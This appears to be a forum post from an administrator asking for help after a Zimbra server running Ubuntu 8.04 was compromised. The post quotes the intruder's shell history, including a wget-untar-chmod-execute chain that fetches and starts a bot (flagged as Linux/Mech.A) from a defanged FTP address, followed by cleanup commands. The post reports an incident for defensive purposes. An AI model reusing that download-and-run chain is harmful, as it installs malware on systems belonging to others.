Hi - a zimbra box I keep an eye on was compromised on 12/7 - I noticed I stopped receiving automated emails from the backup script.

This was in the .bash_history

uname -a
ls -a
cat .bash_history
cd /tmp
ls -a
wget eff-tee-pee://user:123456@;tar -xzvf autorun.tgz;rm -rf autorun.tgz;cd .m;cd conect3;chmod +x *;./start lfg
cd ..
ls -a
cd ..
rm -rf .m
ps x
kill -9 12150

So the zmback cron was removed. It's an Ubuntu 8.04 server, kept up to date with apt. Apart from Zimbra, the only other thing installed is Webmin, which is locked down to being only available to 2 IP addresses. The router only has open ports for the essential Zimbra services (secure IMAP, SSL SMTP etc).

Any advice please? My desktop AVG reports the file as being infected with Linux/Mech.A -

I've altered the URL shown so as to stop people clicking on it.